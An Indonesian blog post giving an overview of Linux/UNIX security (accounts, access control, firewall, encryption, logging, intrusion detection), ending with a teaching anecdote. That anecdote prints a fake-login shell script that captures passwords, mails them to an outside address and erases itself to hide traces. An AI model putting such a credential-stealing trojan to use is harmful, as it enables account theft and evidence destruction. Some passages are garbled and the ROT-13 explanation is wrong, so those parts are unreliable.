Rabu, 25 Mei 2016

SECURITY LINUX/UNIX



1.   PENDAHULUAN          

Linux merupakan sistem operasi open source nomor satu didunia, linux juga banyak digunakan sebagai server untuk hosting website yang ada di internet saat ini. Sistem operasi dengan icon pinguin ini menjadi alternatif bagi orang yang ingin mendalami jaringan komputer, khususnya di Indonesia. Linux merupakan alternatif bagi anda yang bosan menggunakan Windows atau Mac OS.
Linux telah dirancang untuk menawarkan tampilan user interface yang tidak kalah halus bahkan sangat efektif. Anda dapat menggunakan linux untuk penggunaan dirumah atau dikantor anda, linux sangat bisa diandalkan. Linux juga telah menjadi salah satu sistem yang paling banyak digunakan di dunia. Sebagaian besar pusat data terbesar didunia menggunakan linux. Ada berbagai alasan mengapa andapun sebaiknya mencoba menggunakan linux.
Sampai dengan saat ini sistem keamanan Linux memang lebih baik dibandingkan dengan Windows. Itu juga alasan kenapa orang memakai Linux. Linux sudah sangat aman sejak pertama kali install, jadi tidak perlu takut harus melakukan setingan tambahan.


2.    PEMBAHASAN

Pengertian Linux
Linux atau GNU/Linux adalah sistem operasi bebas yang sangat populer untuk computer, Istilah Linux atau GNU/Linux (GNU) juga digunakan sebagai rujukan kepada keseluruhan distro Linux (Linux distribution), yang di dalamnya disertakan program-program lain pendukung sistem operasi. Contoh program tersebut adalah server web, bahasa pemrograman, basisdata, tampilan desktop (Desktop Environment) (seperti GNOME dan KDE), dan aplikasi perkantoran (office suite) seperti OpenOffice.org, KOffice, Abiword, Gnumeric. Distro Linux telah mengalami pertumbuhan yang pesat dari segi popularitas, sehingga lebih populer dari versi UNIX yang menggunakan sistem lisensi dan berbayar (proprietary) maupun versi UNIX bebas lain yang pada awalnya menandingi dominasi Microsoft Windows dalam beberapa sisi. Linux mendukung banyak perangkat keras komputer, dan telah digunakan di berbagai peralatan dari komputer pribadi, superkomputer dan sistem benam (embedded system), seperti telepon seluler (Ponsel) dan perekam video pribadi. Pada awalnya, Linux dibuat, dikembangkan, dan digunakan oleh peminatnya saja. Kini Linux telah mendapat dukungan dari perusahaan besar seperti IBM dan Hewlett- Packard. Para pengamat teknologi informatika beranggapan kesuksesan ini dikarenakan Linux tidak bergantung kepada vendor (vendor independence), biaya operasional yang rendah, dan kompatibilitas yang tinggi dibandingkan versi UNIX proprietari, serta faktor keamanan dan kestabilannya dibandingkan dengan Microsoft Windows. Ciri-ciri ini juga menjadi bukti atas keunggulan model pengembangan perangkat lunak sumber terbuka (opensource software). Linux ini disebarkan secara luas dengan gratis di bawah lisensi GNU
General Publi License (GPL), yang berarti source code Linux juga tersedia bagi publik. Linux dikembangkan oleh perorangan maupun kelompok yang bekerja secara sukarela. Para pengembang Linux memanfaatkan jaringan Internet untuk melakukan tukar-menukar kode, melaporkan bug, dan membenahi segala masalah yang ada. Setiap orang yang tertarik biasanya bergabung dalam pengembangan Linux ini. Pengembangan Linux pertama kali dilakukan oleh Linux Benedict Torvalds pada tahun 1991 di Universitas Helsinki, Finlandia. Kemudian Linux dikembangkan lagi dengan bantuan dari banyak programmer dan pakar UNIX di Internet. Linux ini bisa diperoleh dari beberapa distribusi yang umum digunakan, misalnya RedHat, Debian, Slackware, Caldera, Stampede Linux, TurboLinux dan lain-lain.

Pengertian UNIX     
Unix atau UNIX adalah sebuah sistem operasi komputer yang diawali dari project Multics (Multiplexed Information and Computing Service) pada tahun 1965 yang dilakukan American Telephone and Telegraph AT&T, General Electric (GE), dan Institut Teknologi Massachusetts (MIT), dengan biaya dari Departemen Pertahanan Amerika (Departement of Defence Advenced Research Project, DARPA atau ARPA), UNIX didesain sebagai Sistem operasi yang portable, multi-tasking dan multi-user.
Sistem operasi Unix digunakan secara luas baik sebagai server atau workstation. Arsitektur Unix dan model client/server merupakan elemen yang paling penting dalam perkembangan internet dan mengubah proses komputasi secara terpusat dalam jaringan dari pada proses tunggal di komputer. Linux, merupakan sistem operasi yang diadopsi dari Unix dan tersedia secara bebas mendapat popularitas sebagai alternatif dari sistem operasi proprietary seperti Microsoft Windows

Komponen Arsitektur Keamanan Linux :
1.        Account Pemakai (user account)
Kekuasaan dalam mengadministrasi sistem secara keseluruhan berada dalam satu account, yakni root. Dengan root, Anda bisa mengontrol sistem file, user, sumber daya (devices), bahkan akses jaringan. Model diktatorial ini memudahkan administrator dalam menangani sistem. Jika ada satu user yang melanggar aturan, root bisa membuat account-nya beku, tanpa mengganggu yang lain. Atau mengatur siapa-siapa saja yang boleh mengakses suatu file, memberikan hak khusus pada user-user tertentu.. Setiap user diatur pula lingkungan di mana dia boleh main-main sepuasnya, atau cuma melihat-lihat. Hal ini memberikan keuntungan bagi pemakai maupun sistem

Keuntungan :

  •  Kekuasaan dalam satu account yaitu root, sehingga mudah dalam administrasi system.
  • Kecerobohan salah satu user tidak berpengaruh kepada system secara keseluruhan.

Masing-masing user memiliki privacy yang ketat
Macam User :
Root       : kontrol system file, user, sumber daya (devices) dan akses jaringan
User       : account dengan kekuasaan yang diatur oleh root dalam melakukan aktifitas dalam system.
Group    : kumpulan user yang memiliki hak sharing yang sejenis terhadap suatu     devices tertentu.

2.      Kontrol Akses secara Diskresi (Discretionary Access control)
Setiap pemakai Linux, memiliki account tersendiri, yang masing-masing dibedakan dengan user name dan password. Setiap file memiliki atribut kepemilikan, group, dan user umum. Satu file, bisa diberikan atribut tertentu, sehingga hanya dapat dibaca atau dieksekusi oleh pemiliknya saja. Pembatasan ketat ini dinamakan Discretionary Access Control (DAC). Hal ini pula yang menyebabkan virus jarang ditemui atau jarang tersebar di Linux. Sebab virus biasanya menulis file ke dalam sistem. Dengan DAC, virus hanya berpengaruh pada file-file yang dimiliki oleh salah seorang user yang mengeksekusi virus tersebut. Sedangkan sistemnya sendiri tidak tersentuh
Discretionary Access control (DAC) adalah metode pembatasan yang ketat, yang meliputi :
  • Setiap account memiliki username dan password sendiri.
  • Setiap file/device memiliki atribut(read/write/execution) kepemilikan, group, dan user umum.
3.      Kontrol Akses Jaringan (Network Access Control)
Linux dapat memilih komputer mana saja yang dapat mengaksesnya. Pembatasan antar jaringan ini dinamakan Network Access Control. Alat pengontrolan akses jaringan ini dinamakan firewall.
Firewall linux 1 :
alat pengontrolan akses antar jaringan yang membuat linux dapat memilih host yang berhak / tidak berhak mengaksesnya.
Fungsi Firewall linux :
Analisa Memeriksa dan pfailkteert iTngC Ppa, klaeltu diperlakukan dengan kondisi yang sudah ditentukan, contoh paket A lakukan tindakan B.

4.        Enkripsi (Encryption)
Enkripsi adalah proses mengacak data sehingga tidak dapat dibaca oleh pihak lain. Pada kebanyakan proses enkripsi, Anda harus menyertakan kunci sehingga data yang dienkripsi dapat didekripsikan kembali. Ilmu yang mempelajari teknik enkripsi disebut kriptografi. Gambaran sederhana tentang enkripsi, misalnya mengganti huruf a dengan n, b dengan m dan seterusnya. Model penggantian huruf sebagai bentuk enkripsi sederhana ini sekarang tidak dipergunakan secara serius dalam penyembunyian data. ROT-13 adalah program yang masih suka dipergunakan. Intinya adalah mengubah huruf menjadi 23 huruf didepannya. Misalnya b menjadi o dan seterusnya. Pembahasan enkripsi akan terfokus pada enkripsi password dan enkripsi komunikasi data.
Enkripsi komunikasi data :
Secure Shell (SSH) à Program yang melakukan loging terhadap komputer lain dalam jaringan, mengeksekusi perintah lewat mesin secara remote dan memindahkan file dari satu mesin ke mesin
Secure socket Layer (SSL) mengenkripsi data yang dikirimkan lewat port http.
Konfigurasi dilakukan di : web server APACHE dengan ditambah PATCH SSL

5.        Logging
Linux memiliki fasilitas logging yang sangat komprehensif. Untuk yang baru saja bermigrasi ke Linux, mungkin belum terbiasa memanfaatkan logging. Pada sistem operasi non UNIX, kebanyakan meminimalkan logging, bahkan tidak ada sama sekali. Logging adalah prosedur di mana sebuah sistem operasi atau aplikasi merekam setiap kejadian dan menyimpan rekaman tersebut untuk dapat dianalisa di kemudian hari. Kejadian yang direkam ini bisa saja menyangkut sistem operasi, atau khusus program-program tertentu saja.

6.        Deteksi penyusupan (Intrusion Detection)
Deteksi penyusupan adalah aktivitas untuk mendeteksi penyusupan secara cepat dengan menggunakan program khusus yang otomatis. Program yang dipergunakan biasanya disebut sebagai Intrusion Detection System (IDS). Tipe dasar dari IDS adalah:
·         Rule-based systems - berdasarkan atas database dari tanda penyusupan atau serangan yang telah dikenal. Jika IDS mencatat lalulintas yang sesuai dengan database yang ada, maka langsung dikategorikan sebagai penyusupan.
·         Adaptive systems - mempergunakan metode yang lebih canggih. Tidak hanya berdasarkan database yang ada, tapi juga membuka kemungkinan untuk mendeteksi terhadap bentuk bentuk penyusupan yang baru.

Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :        
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

3.    PENUTUP

KESIMPULAN
Dari sini, Anda sudah mulai mempunyai kepedulian yang cukup terhadap keamanan jaringan Anda. Secara singkat, sudah pelajari bersama bagaimana arsitektur keamanan di Linux. Jika keamanan sudah diset secara maksimal menurut perspektif kita, maka yang diperlukan hanyalah kerajinan untukmembaca file-file log yang dibuat oleh Linux. Meskipun bisa dibilang bahwa jaringan tidak mempunyai data-data keamanan yang penting, tapi kepedulian terhadap masalah keamanan ini akan memudahkan pekerjaan di kemudian hari. Dengan pesatnya perkembangan sistem informasi, maka perlu bagi para pemelihara jaringanuntuk tetap terlibat dalam isu-isu terakhir dalam bidang teknologi. Ketinggalan terhadap isu bug, virus,dan isu keamanan lainnya, akan membuat jaringan yang dirawat menjadi rawan akan penyusupan.                        





Tidak ada komentar:

Posting Komentar